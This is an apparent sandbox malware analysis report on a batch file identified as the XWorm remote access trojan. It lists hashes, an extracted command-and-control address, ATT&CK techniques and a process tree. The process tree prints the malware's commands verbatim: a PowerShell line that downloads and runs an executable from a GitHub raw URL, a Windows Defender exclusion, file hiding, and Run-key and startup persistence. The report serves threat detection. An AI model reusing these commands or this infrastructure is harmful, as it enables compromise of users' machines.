xworm | dd9995205fe2cc6e42086f40327f1aa9a725d2912c7ce2d4cf0839d24baeafb4

Analysis

max time kernel
577s
max time network
596s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
19/11/2024, 10:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

start.bat
Size

30KB
MD5

288f9aa2144276b6994dbf5a69a8da59
SHA1

b860a86ca3c2b0bcd752c05a15d5bd745dfc506a
SHA256

dd9995205fe2cc6e42086f40327f1aa9a725d2912c7ce2d4cf0839d24baeafb4
SHA512

1b47bd833f192d7d7d014872f5cd8be54168a609cc50200dd9c2f290fae2185b8ef54e1fa47d3ca51fe158b294130c74913789781fedc5e1ab60b9a46e09d15f
SSDEEP

48:92ros7BK7cp3zI8FpIJp/4eai2gF9H2YHwvfol2+:92O4dI8ihXf

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

45.83.246.140:30120

Attributes

Install_directory
%AppData%
install_file
runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0029000000045196-59.dat	family_xworm
behavioral1/memory/4732-69-0x0000000000EB0000-0x0000000000EC8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	3432	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4804	powershell.exe
3432	powershell.exe
3444	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation	upx.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.lnk	pack.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.lnk	pack.exe

Executes dropped EXE 2 IoCs

pid	Process
2280	upx.exe
4732	pack.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtime = "C:\\Users\\Admin\\AppData\\Roaming\\runtime.exe"	pack.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com
31	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4732	pack.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4804	powershell.exe
4804	powershell.exe
3444	powershell.exe
3444	powershell.exe
3432	powershell.exe
3432	powershell.exe
2280	upx.exe
4732	pack.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeIncreaseQuotaPrivilege	3444	powershell.exe
Token: SeSecurityPrivilege	3444	powershell.exe
Token: SeTakeOwnershipPrivilege	3444	powershell.exe
Token: SeLoadDriverPrivilege	3444	powershell.exe
Token: SeSystemProfilePrivilege	3444	powershell.exe
Token: SeSystemtimePrivilege	3444	powershell.exe
Token: SeProfSingleProcessPrivilege	3444	powershell.exe
Token: SeIncBasePriorityPrivilege	3444	powershell.exe
Token: SeCreatePagefilePrivilege	3444	powershell.exe
Token: SeBackupPrivilege	3444	powershell.exe
Token: SeRestorePrivilege	3444	powershell.exe
Token: SeShutdownPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeSystemEnvironmentPrivilege	3444	powershell.exe
Token: SeRemoteShutdownPrivilege	3444	powershell.exe
Token: SeUndockPrivilege	3444	powershell.exe
Token: SeManageVolumePrivilege	3444	powershell.exe
Token: 33	3444	powershell.exe
Token: 34	3444	powershell.exe
Token: 35	3444	powershell.exe
Token: 36	3444	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	2280	upx.exe
Token: SeIncreaseQuotaPrivilege	2280	upx.exe
Token: SeSecurityPrivilege	2280	upx.exe
Token: SeTakeOwnershipPrivilege	2280	upx.exe
Token: SeLoadDriverPrivilege	2280	upx.exe
Token: SeSystemProfilePrivilege	2280	upx.exe
Token: SeSystemtimePrivilege	2280	upx.exe
Token: SeProfSingleProcessPrivilege	2280	upx.exe
Token: SeIncBasePriorityPrivilege	2280	upx.exe
Token: SeCreatePagefilePrivilege	2280	upx.exe
Token: SeBackupPrivilege	2280	upx.exe
Token: SeRestorePrivilege	2280	upx.exe
Token: SeShutdownPrivilege	2280	upx.exe
Token: SeDebugPrivilege	2280	upx.exe
Token: SeSystemEnvironmentPrivilege	2280	upx.exe
Token: SeRemoteShutdownPrivilege	2280	upx.exe
Token: SeUndockPrivilege	2280	upx.exe
Token: SeManageVolumePrivilege	2280	upx.exe
Token: 33	2280	upx.exe
Token: 34	2280	upx.exe
Token: 35	2280	upx.exe
Token: 36	2280	upx.exe
Token: SeIncreaseQuotaPrivilege	2280	upx.exe
Token: SeSecurityPrivilege	2280	upx.exe
Token: SeTakeOwnershipPrivilege	2280	upx.exe
Token: SeLoadDriverPrivilege	2280	upx.exe
Token: SeSystemProfilePrivilege	2280	upx.exe
Token: SeSystemtimePrivilege	2280	upx.exe
Token: SeProfSingleProcessPrivilege	2280	upx.exe
Token: SeIncBasePriorityPrivilege	2280	upx.exe
Token: SeCreatePagefilePrivilege	2280	upx.exe
Token: SeBackupPrivilege	2280	upx.exe
Token: SeRestorePrivilege	2280	upx.exe
Token: SeShutdownPrivilege	2280	upx.exe
Token: SeDebugPrivilege	2280	upx.exe
Token: SeSystemEnvironmentPrivilege	2280	upx.exe
Token: SeRemoteShutdownPrivilege	2280	upx.exe
Token: SeUndockPrivilege	2280	upx.exe
Token: SeManageVolumePrivilege	2280	upx.exe
Token: 33	2280	upx.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4732	pack.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3128 wrote to memory of 3608	3128	cmd.exe	82
PID 3128 wrote to memory of 3608	3128	cmd.exe	82
PID 3128 wrote to memory of 4804	3128	cmd.exe	88
PID 3128 wrote to memory of 4804	3128	cmd.exe	88
PID 3128 wrote to memory of 3088	3128	cmd.exe	90
PID 3128 wrote to memory of 3088	3128	cmd.exe	90
PID 3128 wrote to memory of 3444	3128	cmd.exe	91
PID 3128 wrote to memory of 3444	3128	cmd.exe	91
PID 3128 wrote to memory of 2016	3128	cmd.exe	93
PID 3128 wrote to memory of 2016	3128	cmd.exe	93
PID 3128 wrote to memory of 3432	3128	cmd.exe	94
PID 3128 wrote to memory of 3432	3128	cmd.exe	94
PID 3128 wrote to memory of 2280	3128	cmd.exe	95
PID 3128 wrote to memory of 2280	3128	cmd.exe	95
PID 3128 wrote to memory of 944	3128	cmd.exe	96
PID 3128 wrote to memory of 944	3128	cmd.exe	96
PID 2280 wrote to memory of 4732	2280	upx.exe	100
PID 2280 wrote to memory of 4732	2280	upx.exe	100

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2016	attrib.exe
944	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Windows\system32\mode.com
  mode con: cols=100 lines=30
  2⤵
  PID:3608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -window hidden -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4804
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:3088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3444
- C:\Windows\system32\attrib.exe
  attrib +h "Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/sfd11/Nitro-Generator/refs/heads/main/src/utils/upx.exe' -OutFile upx.exe"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3432
- C:\Users\Admin\AppData\Local\Anon\upx.exe
  upx.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2280
- - C:\Users\Admin\AppData\Local\Temp\pack.exe
    "C:\Users\Admin\AppData\Local\Temp\pack.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:4732
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Anon\upx.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Anon\upx.exe

Filesize
33KB

MD5
1583e6e87225b41e7d51f26c93486bf2

SHA1
af26d91d7824d77485c32d361740791239fc197d

SHA256
88ecbc963b0baf145353446e9797ab18140c0db8e919dadb0a4a65717899f3ec

SHA512
8630e00648452e1660a15ed4fbb8fe3000895b9f5cea0bd6e95f703811c755d2a6c0e19d29b17f44e0b509236d3ebc5265d3129e4289188abd8ba1eddc74643c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
e30544e6d048b2c1c6129c89835c16dd

SHA1
21d167ff64825d3f8a5c351c3160b670dc14cb60

SHA256
df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1

SHA512
fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fcemum5f.dnr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pack.exe

Filesize
69KB

MD5
a230d428e97911ce6959e1463d781257

SHA1
0946c13059bf98fd3aacefd0b2681a42b95292cd

SHA256
c8e088feb7de05c3852af588c1a440f61d06870a93b07a3c6b7e2c12c9d55b12

SHA512
089f7f6e979729ba037a19510be160d1c407c712fa01614815ce2427ff6c8fe7fa80a2cb673a36611dc37734aba63f7c87832c3848ac9ce011343c0e15b7aa68

Download Submit
memory/2280-44-0x0000000000060000-0x000000000006E000-memory.dmp

Filesize
56KB

Download
memory/4732-69-0x0000000000EB0000-0x0000000000EC8000-memory.dmp

Filesize
96KB

Download
memory/4804-11-0x00007FFCD8A70000-0x00007FFCD9532000-memory.dmp

Filesize
10.8MB

Download
memory/4804-16-0x00007FFCD8A70000-0x00007FFCD9532000-memory.dmp

Filesize
10.8MB

Download
memory/4804-15-0x00007FFCD8A70000-0x00007FFCD9532000-memory.dmp

Filesize
10.8MB

Download
memory/4804-12-0x00007FFCD8A70000-0x00007FFCD9532000-memory.dmp

Filesize
10.8MB

Download
memory/4804-0-0x00007FFCD8A73000-0x00007FFCD8A75000-memory.dmp

Filesize
8KB

Download
memory/4804-10-0x000001C5462D0000-0x000001C5462F2000-memory.dmp

Filesize
136KB

Download